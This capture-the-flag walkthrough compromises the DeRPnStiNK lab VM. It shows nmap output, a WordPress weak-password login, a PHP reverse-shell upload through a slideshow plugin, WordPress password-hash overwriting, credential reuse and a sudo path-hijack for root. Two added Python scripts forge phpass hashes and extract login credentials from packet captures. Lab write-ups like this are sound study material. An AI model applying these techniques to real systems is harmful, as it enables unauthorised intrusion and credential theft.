Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
Let's open the IP in a web browser.
If we go to Inspect Element and expand every div, we get the first flag: it sits in the page source rather than in the rendered page.
Dirb
Both the nmap and dirb scans show a robots.txt, so let's navigate to it.
As we can see, /php denies us permission and /temporary tells us to try harder.
The dirb scan also shows /weblog. Navigating to it gives an error, because the blog refers to a hostname our machine cannot resolve.
Edit /etc/hosts and add an entry mapping that hostname to the target IP, 192.168.1.116.
Refresh the page and we can see a WordPress blog.
Wpscan
wpscan found 2 plugins and 2 usernames. On the first try I managed to log in using the username admin and the password admin.
After clicking around, I found that under Manage Slides we can edit the slideshow, and at the bottom of the edit form there is an image upload. So I decided to upload a PHP shell through it.
Exploitation
Reverse Shell
Download the PHP reverse shell (php-reverse-shell.php) from pentestmonkey.
Change the $ip and $port variables near the top of the file to our machine's IP and the port we want to catch the shell on, then start a netcat listener on that port before uploading anything.
Then we can go to Manage Slides
and click randonx to edit it.
Scroll to the bottom of the edit form to find the image upload.
Upload the reverse shell file there.
Then go back to /weblog.
Click the right arrow on the slides until the slideshow loads our uploaded PHP file; the listener then catches a reverse shell!
Then we can type:
Running linpeas.sh, I found a MySQL username and password.
Then we can go to /php/phpmyadmin and log into the MySQL database with them.
Open the wordpress database and its wp_users table.
The hashes in wp_users are WordPress phpass ($P$) hashes, which are slow to crack. To make it easy, I copied the admin hash over the unclestinky hash (save the original value first so it can be restored), so unclestinky now also has the password admin.
Then we can log into WordPress again, this time as unclestinky.
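As an added example (not part of the original writeup, and not WordPress's own code), here is the phpass portable hash that WordPress stores in wp_users.user_pass, implemented in Python so you can mint a hash for a password you choose instead of copying admin's over. The UPDATE it emits is meant to be run from the SQL tab in phpMyAdmin against the wordpress database; the user name and password are parameters, and the optional salt argument exists only to make the output reproducible.

```python
"""WordPress (phpass portable, $P$) password hashes: generate, verify, and
emit the UPDATE for a wp_users password reset.  Added example, not WordPress
or phpass source; it reimplements the documented $P$ algorithm."""
import hashlib
import hmac
import os
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant: little-endian 3-byte groups, no padding."""
    out, i = [], 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def _crypt_private(password: str, setting: str) -> str:
    """Core of phpass: md5(salt+pw), then 2**count_log2 rounds of md5(h+pw)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad iteration count")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("bad salt")
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_hash(password: str, count_log2: int = 13, salt: Optional[str] = None) -> str:
    """WordPress default is count_log2 = 13, written as '$P$B' (8192 rounds)."""
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad iteration count")
    if salt is None:
        salt = _encode64(os.urandom(6), 6)      # 6 random bytes -> 8 salt chars
    return _crypt_private(password, "$P$" + ITOA64[count_log2] + salt)


def phpass_check(password: str, stored: str) -> bool:
    """Same check WordPress does at login; constant-time compare of the result."""
    try:
        return hmac.compare_digest(_crypt_private(password, stored), stored)
    except (ValueError, IndexError):
        return False


def reset_sql(user_login: str, new_password: str) -> str:
    """UPDATE to paste into phpMyAdmin (wordpress database) for a chosen password."""
    if "'" in user_login or "\\" in user_login:
        raise ValueError("refusing to build SQL from a quoted user name")
    return (f"UPDATE wp_users SET user_pass = '{phpass_hash(new_password)}' "
            f"WHERE user_login = '{user_login}';")


if __name__ == "__main__":
    print(reset_sql("unclestinky", "ChangeMe-1"))     # hypothetical new password
```

phpass_check is the same routine WordPress runs on login, so it can also be used offline to try a short list of guesses against the original hash without touching the site; at 8192 MD5 rounds per guess it makes clear why the writeup chose to overwrite the hash rather than crack it.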
Go to the posts, and we find the second flag.
We then go back to the database, open the mysql database and its user table.
Then we can take the unclestinky password hash from there and crack it. Unlike the WordPress hashes, these are unsalted mysql_native_password hashes (SHA1 of SHA1, prefixed with *), so they fall quickly to a wordlist or an online lookup.
We got the password wedgie57.
The password is reused on the system, so we can SSH in as the user stinky with it.
Then I went to the Desktop folder and found the third flag!
After that, in /home I found an ftp directory.
Inside it is a chain of ssh-related directories nested one inside another.
After changing directory 7 times, we reach key.txt.
It contains an RSA private key.
This is likely the key for SSH access as the user stinky.
Save the key text to a file named id_rsa in /root/.ssh.
SSH refuses a private key whose permissions are too open, so we need to tighten them.
Type chmod 600 id_rsa (700 also satisfies ssh, but a key file needs no execute bit).
Then we can SSH in as stinky with the key.
Navigate to /home/stinky/Documents, where there is a pcap file.
Transfer it to our machine using nc.
Then analyse the file in Wireshark.
Follow the TCP stream of the login request, and the password for user mrderp is there in clear text.
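The follow-TCP-stream step, as an added example that is not from the writeup: a small pcap reader in plain Python (no scapy, no tshark) that reassembles each direction of every TCP conversation by sequence number, discards retransmissions, and pulls the log= and pwd= fields out of a WordPress login POST. The capture it reads is constructed in-line so it runs offline; the attacker IP 192.168.1.10, the port numbers and the password value are made up for the sample and are not the box's real pcap.

```python
"""Follow a TCP stream in a pcap without Wireshark.  Added example code, not
from the writeup; the capture is built in-line with constructed data."""
import re
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4            # little-endian, microsecond-resolution pcap
CLIENT, SERVER = "192.168.1.10", "192.168.1.116"   # attacker IP is assumed
SAMPLE_REQUEST = (b"POST /weblog/wp-login.php HTTP/1.1\r\nHost: 192.168.1.116\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n"
                  b"Content-Length: 30\r\n\r\nlog=mrderp&pwd=s4mpl3-not-real")
SAMPLE_RESPONSE = b"HTTP/1.1 302 Found\r\nLocation: /weblog/wp-admin/\r\n\r\n"


def _ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_segment(src, dst, sport, dport, seq, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame with placeholder MACs; checksums left zero."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     _ip(src), _ip(dst))
    eth = b"\x00\x0c\x29\x00\x00\x02" + b"\x00\x0c\x29\x00\x00\x01" + b"\x08\x00"
    return eth + ip + tcp + payload


def build_pcap(frames) -> bytes:
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)  # DLT 1 = Ethernet
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def sample_pcap() -> bytes:
    """Constructed capture: request split in two and delivered out of order,
    one retransmission, then the server's reply."""
    a, b = SAMPLE_REQUEST[:40], SAMPLE_REQUEST[40:]
    return build_pcap([
        build_segment(CLIENT, SERVER, 40000, 80, 1040, b),   # second half arrives first
        build_segment(CLIENT, SERVER, 40000, 80, 1000, a),
        build_segment(CLIENT, SERVER, 40000, 80, 1000, a),   # retransmit, must be dropped
        build_segment(SERVER, CLIENT, 80, 40000, 5000, SAMPLE_RESPONSE),
    ])


def follow_tcp_streams(pcap: bytes) -> dict:
    """Map each conversation (sorted endpoint pair) to {direction: reassembled bytes}."""
    magic, = struct.unpack_from("<I", pcap, 0)
    linktype, = struct.unpack_from("<I", pcap, 20)
    if magic != PCAP_MAGIC or linktype != 1:
        raise ValueError("expected a little-endian Ethernet pcap")
    segments = defaultdict(dict)             # (src, sport, dst, dport) -> {seq: payload}
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl, _ = struct.unpack_from("<IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                          # not IPv4-over-Ethernet carrying TCP
        ihl = (frame[14] & 0x0F) * 4
        ip_total, = struct.unpack_from("!H", frame, 16)
        src, dst = ".".join(map(str, frame[26:30])), ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:14 + ip_total]   # ip_total also trims Ethernet padding
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            segments[(src, sport, dst, dport)].setdefault(seq, payload)  # keep first copy
    streams = defaultdict(dict)
    for (src, sport, dst, dport), segs in segments.items():
        conv = tuple(sorted([(src, sport), (dst, dport)]))
        streams[conv][f"{src}:{sport} -> {dst}:{dport}"] = b"".join(segs[s] for s in sorted(segs))
    return dict(streams)


def extract_form_credentials(data: bytes) -> dict:
    """Pull the WordPress login fields (log=, pwd=) out of an HTTP request body."""
    body = data.split(b"\r\n\r\n", 1)[1] if b"\r\n\r\n" in data else data
    return {k.decode(): v.decode() for k, v in re.findall(rb"(log|pwd)=([^&\r\n]*)", body)}


def login_credentials_from_pcap(pcap: bytes) -> dict:
    for conv in follow_tcp_streams(pcap).values():
        for data in conv.values():
            creds = extract_form_credentials(data)
            if "pwd" in creds:
                return creds
    return {}


if __name__ == "__main__":
    print(login_credentials_from_pcap(sample_pcap()))
```

Against a real capture, read the file bytes and pass them to login_credentials_from_pcap; the reader only understands classic little-endian pcap (not pcapng) on Ethernet, and reassembly keeps the first copy of each sequence number, which is enough for a clean capture like this one but not a substitute for Wireshark on lossy or overlapping traffic.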
We then su to the user mrderp.
Then type sudo -l to see what mrderp may run as root.
Privilege Escalation
The sudo rule points at a path under /home/mrderp/binaries, but that folder does not exist inside /home/mrderp.
Since we own our home directory, we create the folder ourselves, put an executable of our own at the path the sudo rule names, and run it with sudo.
Got root!
Navigate to /root/Desktop to get the fourth flag.